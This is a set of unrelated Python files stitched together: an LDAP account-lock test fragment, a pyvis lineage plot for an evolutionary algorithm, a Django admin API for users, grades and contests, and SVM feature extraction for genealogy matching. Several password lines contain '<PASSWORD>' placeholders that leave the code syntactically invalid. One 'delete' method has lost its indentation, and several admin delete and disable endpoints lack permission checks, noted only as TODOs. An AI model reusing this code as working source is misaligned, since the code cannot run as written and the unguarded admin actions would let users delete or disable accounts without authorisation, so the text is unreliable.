        self.setUser(ldap_last_auth_time=timezone.now() - datetime.timedelta(60, 0, 0))
        ldap_helper.export_users()
        self.assertEqual(User.STATUS_LOCKED_INACTIVITY, User.objects.filter(ldap_id=self.USER_LDAP_ID)[0].status)
        self.assertIn(settings.USER_LDAP_MAP["ldap_lock_time"], self.ldapobj.directory[self.USER_FULL_DN])
        self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["ldap_lock_time"]][0], "000001010000Z")

    @mock.patch('data_facility_admin.helpers.KeycloakHelper')
    def test_ldap_inactive_users_created_At(self, mock_keycloak):
        """A never-authenticated user created 60 days ago is also auto-locked."""
        self.setUser(status=User.STATUS_NEW)
        ldap_helper = LDAPHelper()
        ldap_helper.export_users()
        self.setUser(created_at=timezone.now() - datetime.timedelta(60, 0, 0))
        ldap_helper.export_users()
        self.assertEqual(User.STATUS_LOCKED_INACTIVITY, User.objects.filter(ldap_id=self.USER_LDAP_ID)[0].status)
        self.assertIn(settings.USER_LDAP_MAP["ldap_lock_time"], self.ldapobj.directory[self.USER_FULL_DN])
        self.assertEqual(self.ldapobj.directory[self.USER_FULL_DN][settings.USER_LDAP_MAP["ldap_lock_time"]][0], "000001010000Z")
|
# -*- coding: utf-8 -*-
"""
Created on Thu May 27 21:13:08 2021
@author: <NAME>
"""
import pandas as pd
import plotly.io as pio
from pyvis.network import Network
pio.renderers.default = 'browser'
class NetworkPlot:
    """Render a finished Evolution run as an interactive pyvis network.

    Each individual becomes a node; edges point from an individual to its
    two parents, weighted by the inherited share ("Erbanteil").
    """

    def __init__(self, evolution_iteration):
        """
        This class takes a whole evolution class, after the evolution
        process has finished, and creates a network graph to visualize the
        relations between the individuals.

        Parameters
        ----------
        evolution_iteration : class
            Instance of the Evolution.Evolution-Class.

        Returns
        -------
        None.
        """
        self.evolution_iteration = evolution_iteration

    def transform(self):
        """
        Create ``self.df_all_instances``: one row per individual (alive or
        historical) with fitness, coordinates, uuid and parent links.

        Returns
        -------
        None.
        """
        all_instances = (self.evolution_iteration.population_alive
                         + self.evolution_iteration.population_history)
        df_all_instances = pd.DataFrame(
            [(instance.fitness_value, instance.x, instance.y, instance.uuid,
              instance.parent_1_uuid, instance.parent_1_share,
              instance.parent_2_uuid, instance.parent_2_share)
             for instance in all_instances],
            columns=["f(x,y)", "x", "y", "Uuid", "Parent 1 Uuid",
                     "Parent 1 Erbanteil", "Parent 2 Uuid",
                     "Parent 2 Erbanteil"])
        self.df_all_instances = df_all_instances

    def plot(self):
        """
        Create the network plot and write it to 'networkgraph.html'.

        Returns
        -------
        None.
        """
        # initialize the network graph
        net = Network(height='100%', width='100%', bgcolor='#222222',
                      layout=False, font_color='white')
        # define a json with plotting parameters
        net.set_options("""
var options = {
  "nodes": {
    "shape": "circle"
  },
  "edges": {
    "arrows": {
      "from": {
        "enabled": true,
        "scaleFactor": 0.95
      }
    },
    "color": {
      "inherit": true
    },
    "scaling": {
      "max": 1
    },
    "smooth": false
  },
  "physics": {
    "hierarchicalRepulsion": {
      "centralGravity": 0,
      "nodeDistance": 275
    },
    "minVelocity": 0.75,
    "solver": "hierarchicalRepulsion"
  }
}""")
        #net.show_buttons()
        # add each individual to the network
        for index, row in self.df_all_instances.iterrows():
            # NOTE(review): size=1+int(10/f) raises ZeroDivisionError for a
            # fitness of exactly 0 — confirm fitness can never be 0 here.
            net.add_node(row["Uuid"], row["Uuid"], title=f"f(x,y) = {row['f(x,y)']}", size=1+int(10/row["f(x,y)"]))
            try:
                net.add_node(row["Parent 1 Uuid"], row["Parent 1 Uuid"], title=row["Parent 1 Uuid"])
                net.add_edge(row["Uuid"], row["Parent 1 Uuid"], value=1/row["Parent 1 Erbanteil"])
                net.add_node(row["Parent 2 Uuid"], row["Parent 2 Uuid"], title=row["Parent 2 Uuid"])
                net.add_edge(row["Uuid"], row["Parent 2 Uuid"], value=1/row["Parent 2 Erbanteil"])
            except Exception:
                # best-effort: root individuals have no parents (missing
                # uuid / zero share); skip their edges.  Was a bare
                # 'except:' — narrowed so Ctrl-C etc. still propagate.
                pass

        neighbor_map = net.get_adj_list()
        # add neighbor data to node hover data
        for node in net.nodes:
            node['title'] += ' Neighbors:<br>' + '<br>'.join(neighbor_map[node['id']])
            node['value'] = len(neighbor_map[node['id']])
        # plot the network
        net.show('networkgraph.html')
|
<reponame>AngleMAXIN/nomooc<gh_stars>1-10
import os
import re
import time
from wsgiref.util import FileWrapper
import xlrd
import xlsxwriter
from django.conf import settings
from django.contrib.auth.hashers import make_password
from django.db import transaction, IntegrityError
from django.db.models import Q, Count, F
from django.http import HttpResponse, StreamingHttpResponse
from contest.models import ContestPartner, Contest
from submission.models import Submission
from utils.api import APIView, validate_serializer
from utils.shortcuts import rand_str
from ..models import AdminType, ProblemPermission, User, UserProfile, Grade, OwnInfo, UserRegisterType, \
AdminOperationRecord
from ..serializers import (
RankInfoSerializer,
UserAdminSerializer,
GenerateUserSerializer,
UserDepartmentsSerializer,
UserProfileSerializer,
ImportUserSeralizer,
UserGradeListSerializers,
UploadUsersForm, AdminOperationRecordSerializers)
class UserAdminAPI(APIView):
    """Admin endpoints for user management: bulk import (POST), update
    (PUT) and list/detail (GET)."""

    # maps the "user_type" query parameter to an AdminType value
    _u_types = {
        "1": AdminType.Student,
        "2": AdminType.Teacher,
        "3": AdminType.Helper,
        "4": AdminType.Admin,
        "5": AdminType.SUPER_ADMIN
    }
    # columns fetched for the list view (spans User and UserProfile)
    val_list = (
        "id",
        "user_id",
        "email",
        "phone",
        "grade_id",
        "is_disabled",
        "create_time",
        "last_login",
        "userprofile__class_id",
        "userprofile__avatar",
        "userprofile__level",
        "userprofile__real_name",
        "userprofile__department",
        "userprofile__major",
    )
    @validate_serializer(ImportUserSeralizer)
    def post(self, request):
        """Bulk-import users; each row is [username, password, class_name].

        All rows are assumed to belong to one class (taken from the first
        row); the Grade is created on first sight.
        """
        data = request.data["users"]
        user_list, gra_result = [], None
        # number of students in the class
        user_number = len(data)
        # at least one row and >= 3 columns per row; the frontend is
        # expected to have validated the payload already
        if user_number != 0 and len(data[0]) >= 3:
            grade_name = data[0][2]
            try:
                gra_result = Grade.objects.get(class_name=grade_name)
            except Grade.DoesNotExist:
                # TODO: add logging for this error path
                gra_result = Grade.objects.create(
                    class_name=grade_name, number=user_number)
            finally:
                # the class now exists (created above with an empty
                # teacher if it was missing); build the User rows
                for user_data in data:
                    if len(user_data) != 3 or len(user_data[0]) > 32:
                        return self.error(
                            f"Error occurred while processing data '{user_data}'")
                    user_list.append(
                        User.objects.create(
                            username=user_data[0],
                            # NOTE(review): '<PASSWORD>' is dataset-anonymization
                            # residue — presumably make_password; confirm in VCS.
                            password=<PASSWORD>(
                                user_data[1]),
                            email=user_data[2],
                            grade=gra_result,
                            grade_name=grade_name))
        try:
            with transaction.atomic():
                [UserProfile(user=user).save() for user in user_list]
            return self.success()
        except IntegrityError as e:
            return self.error(str(e))
    def put(self, request):
        """Update one user's account fields and profile.

        ``request.data`` holds the profile fields plus a nested "user"
        dict (id, email, phone, admin_type).  Problem permission is
        derived from the admin type; students are (re)attached to a
        Grade record.
        """
        data = request.data
        _user = data.pop("user")
        # reject an email already taken by a different account
        if _user.get("email"):
            user = User.objects.filter(
                email=_user.get("email")).exclude(
                pk=_user.get("id"))
            if user.exists():
                return self.error("邮箱已经存在")
        admin_type = _user.get("admin_type")
        if admin_type == AdminType.Admin:
            problem_permission = ProblemPermission.ALL
        elif admin_type == AdminType.Teacher:
            problem_permission = ProblemPermission.OWN
        else:
            problem_permission = ProblemPermission.NONE
        if admin_type == AdminType.Student:
            # students get (or create) their Grade record
            gid, _ = Grade.objects.get_or_create(
                level=data['level'],
                major=data["major"],
                department=data['department'],
                edu_level=data['edu_level'],
                class_id=data['class_id'])
            User.objects.filter(
                pk=_user.get("id")).update(
                grade_id=gid.id
            )
            # NOTE(review): stu_number is incremented on every update, not
            # only on first assignment — confirm this is intended.
            Grade.objects.filter(
                pk=gid.id).update(
                stu_number=F("stu_number") + 1)
        else:
            # non-students carry no grade
            User.objects.filter(
                pk=_user.get("id")).update(
                grade=None
            )
        uid = _user.get("id")
        User.objects.filter(
            pk=uid).update(
            phone=_user.pop("phone"),
            email=_user.pop("email"),
            admin_type=admin_type,
            problem_permission=problem_permission,
        )
        # remaining keys in data are UserProfile fields
        data.pop("grade", None)
        UserProfile.objects.filter(user_id=uid).update(**data)
        return self.success()
    # TODO: login throttling / rate limiting
    def get(self, request):
        """Return one user's profile (``?id=``) or a filtered, paginated
        user list.

        List filters: user_type (mapped via _u_types), keyword (fuzzy on
        user id / real name / email), status, is_auth, and — for students —
        Grade attributes (level/major/class_id/edu_level/department).
        """
        uid = request.GET.get("id", None)
        if uid:
            try:
                user = User.objects.select_related(
                    "userprofile").get(pk=uid)
            except User.DoesNotExist:
                return self.error("此用户不存在")
            return self.success(UserProfileSerializer(user.userprofile).data)
        user_type = request.GET.get("user_type", None)
        user_type = self._u_types.get(user_type)
        user = User.objects.filter(
            admin_type=user_type,
            register_type__in=(
                'normal',
                'factory',
            )).select_related("userprofile").only(
            *
            self.val_list).values(
            *
            self.val_list)
        keyword = request.GET.get("keyword", None)
        # keyword may be a user id, real name or email; fuzzy
        # (icontains) matching
        if keyword:
            user = user.filter(Q(user_id__icontains=keyword) |
                               Q(userprofile__real_name__icontains=keyword) |
                               Q(email__icontains=keyword))
        status = request.GET.get("status", None)
        # account status: "true" = enabled, "false" = disabled
        if status == "true":
            user = user.filter(is_disabled=False)
        elif status == "false":
            user = user.filter(is_disabled=True)
        is_auth = request.GET.get("is_auth")
        if is_auth == "1":
            user = user.filter(is_auth=True)
        elif is_auth == "0":
            user = user.filter(is_auth=False)
        info = request.GET.get("info", None)
        if info:
            filter_params = {}
            if user_type == AdminType.Student:
                # students: narrow by Grade attributes
                le = request.GET.get("level")
                if le:
                    filter_params['level'] = le
                m = request.GET.get("major")
                if m:
                    filter_params['major'] = m
                d = request.GET.get("class_id")
                if d:
                    filter_params['class_id'] = d
                edl = request.GET.get("edu_level")
                if edl:
                    filter_params['edu_level'] = edl
                dep = request.GET.get("department")
                if dep:
                    filter_params['department'] = dep
                grade_id = Grade.objects.filter(
                    **filter_params).values_list("id", flat=True)
                if not grade_id.exists():
                    # no matching grades -> empty result page
                    data = dict(results=[], total=0)
                    return self.success(data)
                user = user.filter(grade_id__in=grade_id)
            else:
                # non-students: filter by profile department only
                dep = request.GET.get("department")
                if dep:
                    user = user.filter(userprofile__department__icontains=dep)
        user = user.order_by('-last_login')
        return self.success(
            self.paginate_data(
                request,
                user,
                UserAdminSerializer))
    def delete_one(self, user_id):
        """Delete a single user together with their submissions.

        Returns an error-message string on failure, None on success.
        """
        with transaction.atomic():
            try:
                user = User.objects.get(id=user_id)
            except User.DoesNotExist:
                return "此用户不存在"
            # if user.admin_type == AdminType.Student:
            # Remove the user's submissions first, then the account itself.
            Submission.objects.filter(user_id=user_id).delete()
            # else:
            # return "禁用的操作"
            user.delete()
# @super_admin_required
# todo 权限检查
def delete(self, request):
uids = request.GET.get("ids")
if not uids:
return self.error("格式不合格")
for _id in uids.split(","):
if _id.isdigit():
error = self.delete_one(_id)
if error:
return self.error(error)
return self.success()
class UserBatchImport(APIView):
    """Batch-import users from an uploaded Excel sheet (.xls/.xlsx)."""
    request_parsers = ()

    def process_file(self, f):
        """Parse the first worksheet; rows from index 2 on are user rows.

        Returns a list of row-value lists, or None when the sheet is too
        small (fewer than 3 rows or no columns).
        """
        file = xlrd.open_workbook(file_contents=f.read())
        table = file.sheets()[0]
        column_num, rows_num = table.ncols, table.nrows
        if rows_num < 3 or column_num < 1:
            return None
        user_list = []
        # The first two rows are header/description rows and are skipped.
        for line in range(2, rows_num):
            row_value = table.row_values(line)
            user_list.append(row_value)
        return user_list

    def generate_users(self, user_list, user_type=AdminType.Student):
        """Create a User + UserProfile per row ([real_name, user_id]).

        Returns {'failedItem': [...], 'successItem': [...]}.
        """
        generate_res = dict(
            failedItem=list(),
            successItem=list())
        for user_id_name in user_list:
            real_name, user_id = user_id_name
            # Reject rows whose combined name+id is implausibly short.
            if len(real_name) + len(user_id) < 4:
                generate_res['failedItem'].append(user_id_name)
                continue
            try:
                # NOTE(review): the password expression was redacted
                # (<PASSWORD>) in this copy of the source.
                u = User.objects.create(
                    user_id=user_id,
                    admin_type=user_type,
                    password=<PASSWORD>),
                    register_type=UserRegisterType.FACTORY)
                UserProfile.objects.create(user=u, real_name=real_name)
                generate_res['successItem'].append(user_id_name)
            except IntegrityError:
                # Duplicate user_id (unique constraint) -> record as failed.
                generate_res['failedItem'].append(user_id_name)
        return generate_res

    def post(self, request):
        """Validate the uploaded file, then import its rows as users."""
        if not request.FILES:
            return self.error("请确保文件上传")
        file = request.FILES['file']
        # NOTE(review): split('.')[1] breaks for names containing more than
        # one dot; [-1] would be the actual extension.
        if file.name.split('.')[1] not in ['xlsx', 'xls']:
            return self.error("文件格式不合格")
        file_form = UploadUsersForm(request.POST, request.FILES)
        if not file_form.is_valid():
            return self.error("文件格式错误")
        f = request.FILES.get("file")
        user_list = self.process_file(f)
        if not user_list:
            return self.error("数据格式不合格")
        generate_res = self.generate_users(
            user_list, request.POST.get("user_type"))
        # Deliberate 3-second delay before responding.
        time.sleep(3)
        return self.success(data=generate_res)

    def get(self, request):
        """Download the Excel template used for batch import."""
        FILE_NAME = "import_users.xlsx"
        import_model_file = os.path.join(settings.USER_MODEL_DIR, FILE_NAME)
        if not os.path.isfile(import_model_file):
            return self.error("文件不存在")
        response = StreamingHttpResponse(
            FileWrapper(
                open(
                    import_model_file,
                    "rb")),
            content_type="application/xlsx")
        response["Content-Disposition"] = f"attachment; filename={FILE_NAME}"
        response["Content-Length"] = os.path.getsize(import_model_file)
        return response

    def delete(self, request):
        """Delete a user by user_id; expects User + Profile removed."""
        user_id = request.GET.get("user_id")
        res = User.objects.filter(user_id=user_id).delete()
        # delete() returns (total_rows, per-model dict); 2 rows means the
        # User and its cascade-deleted UserProfile were both removed.
        if res[0] != 2:
            return self.error()
        return self.success()
class GenerateUserAPI(APIView):
    # @admin_role_required
    def get(self, request):
        """
        download users excel

        Streams a previously generated /tmp/<file_name>.xlsx and deletes
        it afterwards; file_name must be purely alphanumeric, which also
        acts as a path-traversal guard.
        """
        file_name = request.GET.get("file_name")
        if not file_name:
            return self.error("参数错误")
        if not re.match(r"^[a-zA-Z0-9]+$", file_name):
            return self.error("非法文件名")
        file_path = f"/tmp/{file_name}.xlsx"
        if not os.path.isfile(file_path):
            return self.error("文件不存在")
        with open(file_path, "rb") as f:
            raw_data = f.read()
        # The file is one-shot: remove it once its bytes are in memory.
        os.remove(file_path)
        response = HttpResponse(raw_data)
        response["Content-Disposition"] = f"attachment; filename={file_name}.xlsx"
        response["Content-Type"] = "application/xlsx"
        return response

    @validate_serializer(GenerateUserSerializer)
    def post(self, request):
        """
        Generate User

        Creates `number` temporary student accounts for a contest and
        writes their credentials into /tmp/contest_<id>_UserList.xlsx.
        """
        data = request.data
        contest_id = data['contest_id']
        con = Contest.objects.filter(pk=contest_id).values("id")
        if not con.exists():
            return self.error("此场竞赛不存在")
        file_name = f"contest_{con[0]['id']}_UserList"
        temp_file_path = f"/tmp/{file_name}.xlsx"
        workbook = xlsxwriter.Workbook(temp_file_path)
        worksheet = workbook.add_worksheet()
        worksheet.write("A1", "UserID")
        worksheet.write("B1", "Password")
        worksheet.write("C1", "RealName")
        # Username prefix gets one random digit appended to reduce clashes.
        user_list, len_password, prefix = [
        ], data['password_len'], data['prefix'] + rand_str(1, 'num')
        for number in range(data["number"]):
            # NOTE(review): password generation was redacted (<PASSWORD>)
            # in this copy of the source.
            raw_password = <PASSWORD>(<PASSWORD>)
            user = User(
                register_type=UserRegisterType.TEMP,
                admin_type=AdminType.Student,
                is_auth=True,
                user_id=data['prefix'] + rand_str(8, "num"),
                username=f"{prefix}{number}",
                password=<PASSWORD>(<PASSWORD>))
            user.raw_password = <PASSWORD>
            user_list.append(user)
        try:
            with transaction.atomic():
                up_list, cp_list, i = [], [], 1
                for u in user_list:
                    u.save()
                    up_list.append(
                        UserProfile(
                            user_id=u.id,
                            real_name=u.username))
                    cp_list.append(
                        ContestPartner(
                            contest_id=contest_id,
                            user_id=u.id))
                UserProfile.objects.bulk_create(up_list)
                ContestPartner.objects.bulk_create(cp_list)
                # Write credentials starting at row 1 (row 0 is the header).
                for user in user_list:
                    worksheet.write_string(i, 0, user.user_id)
                    worksheet.write_string(i, 1, user.raw_password)
                    worksheet.write_string(i, 2, user.username)
                    i += 1
                workbook.close()
                return self.success({"filename": file_name})
        except IntegrityError as e:
            return self.error(str(e))
class AddContestUsersAPI(APIView):
    """Attach an explicit list of existing users to a contest."""

    def post(self, request):
        # Requires teacher/admin role (enforced elsewhere).
        data = request.data
        contest_id = data.get("contest_id")
        user_id_list = data.get("user_id_list")
        if not all((contest_id, user_id_list,)):
            return self.error("请确保信息完整")
        try:
            contest = Contest.objects.only("s_number").get(pk=contest_id)
        except Contest.DoesNotExist:
            return self.error("用户或竞赛不存在")
        curr_num = contest.s_number
        # Build the membership rows up front. (The original used a
        # side-effect list comprehension that built and discarded a list
        # of Nones — replaced with a plain comprehension assignment.)
        cp_list = [ContestPartner(user_id=uid, contest_id=contest_id)
                   for uid in user_id_list]
        count = 0
        for cp in cp_list:
            # Save each row in its own atomic block so one duplicate
            # (IntegrityError) does not abort the rest of the batch.
            try:
                with transaction.atomic():
                    cp.save()
                count += 1
            except IntegrityError:
                pass
        # Keep the contest's cached participant counter in sync.
        contest.s_number = curr_num + count
        contest.save(update_fields=('s_number',))
        return self.success(count)
class FilterConditionAPI(APIView):
    """Cascading filter options for grade-selection widgets."""
    # TODO: add permission checks

    def get(self, request):
        """Return the distinct values for the *next* filter level.

        The client drills down department -> level -> major -> class_id;
        whichever parameters are already supplied determine which key's
        distinct values are returned next.
        """
        level = request.GET.get("level")
        major = request.GET.get("major")
        class_id = request.GET.get("class_id")
        department = request.GET.get("department")
        if not any((level, major, class_id, department,)):
            # Nothing chosen yet: offer all departments.
            key = "department"
            info = Grade.objects.all()
        elif not any((level, major, class_id,)) and department:
            # Department chosen: offer its levels.
            key = "level"
            info = Grade.objects.filter(department=department)
        elif not any((major, class_id,)) and all((department, level,)):
            # Department + level chosen: offer majors.
            key = "major"
            info = Grade.objects.filter(
                level=level, department=department)
        else:
            # Everything else: offer class ids.
            key = "class_id"
            info = Grade.objects.filter(
                level=level, major=major, department=department)
        info = info.values(key).distinct()
        return self.success(data=[i for i in info])
class UserDepartmentsAPI(APIView):
    # TODO: permission checks

    def get(self, request):
        """Return every department value recorded in OwnInfo."""
        departments = OwnInfo.objects.all().values("department")
        payload = UserDepartmentsSerializer(departments, many=True).data
        return self.success(payload)
class UserCheckUserIdAPI(APIView):
    """Check whether a user_id is already taken (and by whom)."""
    # TODO: permission checks

    def post(self, request):
        """Return {'exists': bool, 'info': real_name or None}."""
        data = request.data
        user_id = data.get("user_id")
        result = {
            "exists": False,
            "info": None
        }
        if user_id:
            # Single query via first() — the original called exists() and
            # then indexed the queryset, hitting the database twice.
            row = User.objects.filter(
                user_id=user_id).values("userprofile__real_name").first()
            if row is not None:
                result["exists"] = True
                result["info"] = row.get("userprofile__real_name")
        return self.success(result)
class AddOneStudentToContestAPI(APIView):
    """Look up (or lazily create) one student for contest registration."""

    def post(self, request):
        # Given a user_id and real name:
        # - if the user exists, return their admin-view fields;
        # - otherwise create the user + profile and return the new record.
        data = request.data
        user_id = data.get("user_id")
        real_name = data.get("real_name")
        val_list = UserAdminAPI.val_list
        user = User.objects.filter(
            user_id=user_id).select_related("userprofile").only(
            *
            val_list).values(
            *
            val_list)
        if not user.exists():
            u = User.objects.create(
                user_id=user_id,
                register_type=UserRegisterType.FACTORY)
            up = UserProfile.objects.create(real_name=real_name, user=u)
            # NOTE(review): the password argument was redacted (<PASSWORD>)
            # in this copy of the source.
            u.set_password(<PASSWORD>)
            u.save()
            # Shape mirrors the .values() keys of the queryset branch.
            result = dict(
                id=u.id,
                user_id=u.user_id,
                userprofile__real_name=real_name,
                userprofile__avatar=up.avatar)
        else:
            result = UserAdminSerializer(user[0]).data
        return self.success(data=result)
class UserTobeDisable(APIView):
    # TODO: permission checks

    def put(self, request):
        """Enable/disable one account; `opera` is the new is_disabled value."""
        uid = request.data.get("id")
        opera = request.data.get("opera")
        if not uid:
            return self.error("修改失败")
        updated = User.objects.filter(id=uid).update(is_disabled=opera)
        return self.success(data=updated)
class UserGradeListAPI(APIView):
    """Paginated grade list plus a per-grade student-count map."""

    def get(self, request):
        fields = (
            "id",
            "level",
            "major",
            "department",
            "class_id",
            "edu_level",
            "create_time",
        )
        keyword = request.GET.get("keyword")
        list_grade = Grade.objects.filter()
        if keyword:
            # Fuzzy-match the keyword against several grade attributes.
            # NOTE(review): .values(*fields) is only applied on this branch;
            # without a keyword the raw queryset reaches the paginator —
            # confirm the serializer accepts both shapes.
            list_grade = list_grade.filter(
                Q(
                    major__contains=keyword) | Q(
                    department__contains=keyword) | Q(
                    level__contains=keyword) | Q(
                    edu_level__contains=keyword)).values(
                *fields)
        # Per-user (grade_id, count) rows summed into map_grade below.
        # NOTE(review): Count("grade_id") on an un-grouped User queryset
        # yields 1 per row; values("grade_id").annotate(Count("id")) would
        # express the aggregation directly in SQL.
        list_grade_stu_number = User.objects.filter(
            grade__isnull=False).annotate(
            student_number=Count("grade_id")).values_list(
            'grade_id',
            "student_number")
        map_grade = {}
        for item in list_grade_stu_number:
            if map_grade.get(item[0]):
                map_grade[item[0]] += item[1]
            else:
                map_grade.setdefault(item[0], item[1])
        data = self.paginate_data(
            request, list_grade, UserGradeListSerializers)
        data['grades_stu_num'] = map_grade
        return self.success(data)
class UserOfGradeListAPI(APIView):
    """Paginated listing of all users belonging to one grade."""

    def get(self, request):
        grade_id = request.GET.get("grade_id")
        columns = (
            "id",
            "user_id",
            "email",
            "phone",
            "grade_id",
            "is_disabled",
            "create_time",
            "last_login",
            "userprofile__class_id",
            "userprofile__avatar",
            "userprofile__level",
            "userprofile__real_name",
            "userprofile__department",
            "userprofile__major",
        )
        members = (User.objects.select_related("userprofile")
                   .filter(grade_id=grade_id)
                   .values(*columns))
        page = self.paginate_data(request, members, UserAdminSerializer)
        return self.success(page)
class UserOfGradeRankAPI(APIView):
    """Accepted/submission ranking of users within matching grades."""

    def get_list_grade_id(self, level, major):
        """Ids of every grade with the given level and major."""
        return Grade.objects.filter(
            level=level, major=major).values_list("id", flat=True)

    def get_user_rank(self, request, grade_list=None, real_name=""):
        """Paginated profile ranking, optionally narrowed by real name."""
        columns = (
            "user__user_id",
            "user__username",
            "avatar",
            "submission_number",
            "accepted_number",
            "real_name",
            "user_id",)
        criteria = dict(user__grade_id__in=grade_list)
        if real_name:
            criteria['real_name__contains'] = real_name
        # Most accepted first; ties broken by fewest submissions.
        ranking = (UserProfile.objects.filter(**criteria)
                   .select_related("user")
                   .values(*columns)
                   .order_by("-accepted_number", "submission_number"))
        return self.paginate_data(
            request,
            ranking,
            RankInfoSerializer)

    def get(self, request):
        level = request.GET.get("level")
        major = request.GET.get("major")
        real_name = request.GET.get("real_name")
        matching_grades = self.get_list_grade_id(level, major)
        page = self.get_user_rank(request, matching_grades, real_name)
        return self.success(page)
class UserGradeOne(APIView):
    """Fetch the descriptive fields of a single grade."""

    def get(self, request):
        grade_id = request.GET.get("grade_id")
        columns = (
            "level",
            "major",
            "department",
            "edu_level",
            "class_id",
        )
        rows = Grade.objects.filter(pk=grade_id).values(*columns)
        if not rows.exists():
            # Unknown grade: succeed with an empty payload.
            return self.success()
        return self.success(data=rows[0])
class UserAdminOperationRecord(APIView):
    """Paginated feed of admin operation records, newest first."""

    def get(self, request):
        offset = int(request.GET.get("offset", 0))
        limit = int(request.GET.get("limit", 20))
        # MySQL `LIMIT offset, row_count`: the second placeholder is the
        # page size, not an end index. The original passed `limit + offset`
        # as the count, returning up to `offset` extra rows per page.
        query = """select ad.id, ad.u_type, ad.action, ad.action_time, ad.api, ad.location, up.real_name from
admin_op_record ad inner join user_profile up on up.user_id=ad.uid order by action_time desc limit %s, %s; """
        # `translations` must be a dict when given; the original passed ""
        # — dropped so the default (None) applies.
        list_record = AdminOperationRecord.objects.raw(
            query, params=[offset, limit])
        data = {
            "total": AdminOperationRecord.objects.count(),
            "results": AdminOperationRecordSerializers(list_record, many=True).data,
        }
        return self.success(data=data)
|
# -*- coding: utf-8 -*-
# This Python file uses the following encoding: utf-8
"""
Calculate SVM feature vector for various choices
Normally the selected routine is called as 'SVMfeatures'
"""
from matchUtils import *
from matchtext import matchtext
def personDefault(workP=None, matchP=None, conf=None, score=None, nodeScore=None,
                  famScore=None, cosScore=None, features=None, matchtxtLen=None):
    """
    Optimized version of myselNoScore.

    Build the SVM feature vector for a person-match candidate. When a
    precomputed `features` dict is supplied it is read directly; otherwise
    the features are derived from the raw records `workP`/`matchP` and the
    externally supplied similarity scores. None entries become 0.0 in the
    returned list.
    """
    fList = []
    if features is not None:
        # Fast path: read values straight out of the features dict, in the
        # same order the computed path below produces them.
        fList.append(features['givenName']['eq'])
        fList.append(features['lastName']['eq'])
        fList.append(features['name']['strSim'])
        fList.append(features['birthYear']['eq'])
        fList.append(features['birthYear']['neq'])
        fList.append(features['birthYear']['sim'])
        fList.append(features['birthDate']['eq'])
        fList.append(features['birthDate']['neq'])
        fList.append(features['birthDate']['sim'])
        fList.append(features['birthPlace']['eq'])
        fList.append(features['birthPlace']['neq'])
        fList.append(features['birthPlace']['sim'])
        fList.append(features['deathYear']['eq'])
        fList.append(features['deathYear']['sim'])
        fList.append(features['deathDate']['eq'])
        fList.append(features['deathDate']['sim'])
        fList.append(features['deathPlace']['sim'])
        fList.append(features['cosSim'])
        fList.append(features['cosSimNorm'])
        fList.append(features['NodeSim'])
        fList.append(features['FamilySim'])
        return [0.0 if v is None else v for v in fList]
    # Computed path. The original's bare `except:` clauses (which also
    # trapped KeyboardInterrupt/SystemExit) are narrowed to
    # `except Exception:` — their purpose is only to map missing or
    # ill-formed fields to None.
    # givenName eq — 0.6 below is an arbitrary similarity threshold.
    if (workP['grpNameGiven'] and matchP['grpNameGiven'] and
            (compName(workP['grpNameGiven'], matchP['grpNameGiven'])) >= 0.6):
        fList.append(1)
    else:
        fList.append(0)
    # lastName eq
    if (workP['grpNameLast'] and matchP['grpNameLast'] and
            (compName(workP['grpNameLast'], matchP['grpNameLast'])) >= 0.6):
        fList.append(1)
    else:
        fList.append(0)
    # name strSim (GEDCOM-style slashes stripped)
    fList.append(strSim(workP['name'].replace('/', ''), matchP['name'].replace('/', '')))
    # birthYear eq / neq — first 4 chars of the date are the year
    try:
        vals = compValAlla(workP['birth']['date'][0:4], matchP['birth']['date'][0:4])
        fList.append(vals[0])
        fList.append(vals[1])
    except Exception:
        fList.append(None)
        fList.append(None)
    # birthYear sim
    try:
        vals = dateSim(workP['birth']['date'][0:4], matchP['birth']['date'][0:4])
    except Exception:
        vals = None
    fList.append(vals)
    # birthDate eq / neq
    try:
        vals = compValAlla(workP['birth']['date'], matchP['birth']['date'])
        fList.append(vals[0])
        fList.append(vals[1])
    except Exception:
        fList.append(None)
        fList.append(None)
    # birthDate sim
    try:
        vals = dateSim(workP['birth']['date'], matchP['birth']['date'])
    except Exception:
        vals = None
    fList.append(vals)
    # birthPlace eq / neq (normalized place ids)
    try:
        vals = compValAlla(workP['birth']['normPlaceUid'], matchP['birth']['normPlaceUid'])
        fList.append(vals[0])
        fList.append(vals[1])
    except Exception:
        fList.append(None)
        fList.append(None)
    # birthPlace sim (free-text place names)
    try:
        vals = strSim(workP['birth']['place'], matchP['birth']['place'])
    except Exception:
        vals = None
    fList.append(vals)
    # deathYear eq
    try:
        vals = compValAlla(workP['death']['date'][0:4], matchP['death']['date'][0:4])
        fList.append(vals[0])
    except Exception:
        fList.append(None)
    # deathYear sim
    try:
        vals = dateSim(workP['death']['date'][0:4], matchP['death']['date'][0:4])
    except Exception:
        vals = None
    fList.append(vals)
    # deathDate eq
    try:
        vals = compValAlla(workP['death']['date'], matchP['death']['date'])
        fList.append(vals[0])
    except Exception:
        fList.append(None)
    # deathDate sim
    try:
        vals = dateSim(workP['death']['date'], matchP['death']['date'])
    except Exception:
        vals = None
    fList.append(vals)
    # deathPlace sim
    try:
        vals = strSim(workP['death']['place'], matchP['death']['place'])
    except Exception:
        vals = None
    fList.append(vals)
    # cosSim
    fList.append(cosScore)
    # cosSimNorm — length normalization: maxLen = 54
    fList.append(cosScore * (matchtxtLen / 54.0))
    # NodeSim
    fList.append(nodeScore)
    # FamilySim
    fList.append(famScore)
    return [0.0 if v is None else v for v in fList]
##########################FAMILY#################
import logging #??
import common
from collections import defaultdict
def famBaseline(work, match, config):
    """Build the baseline SVM feature vector for a family-match candidate.

    `work`/`match` are family documents and `config` holds the collection
    handles. Returns the feature list with None mapped to 0.0, or None
    when either family document is missing.
    """
    if not work or not match:
        return None
    fmatch = config['fam_matches'].find_one({'workid': work['_id'], 'matchid': match['_id']})
    if not fmatch:
        # No stored comparison yet — compute one on demand.
        from utils import matchFam
        fmatch = matchFam(work['_id'], match['_id'], config)
    features = []
    # Family structure similarity.
    features.append(familySim(work, config['persons'], match, config['match_persons']))
    # Partner statuses: each of husb/wife contributes 0.5 to the matching
    # colour bucket (green=confirmed, yellow=manual, red=rejected).
    green = 0.0
    yellow = 0.0
    red = 0.0
    for partner in ('husb', 'wife'):
        # `except Exception:` (was a bare except) covers missing partner
        # entries or status fields; those simply contribute nothing.
        try:
            if fmatch[partner]['status'] in common.statOK:
                green += 0.5
            elif fmatch[partner]['status'] in common.statManuell:
                yellow += 0.5
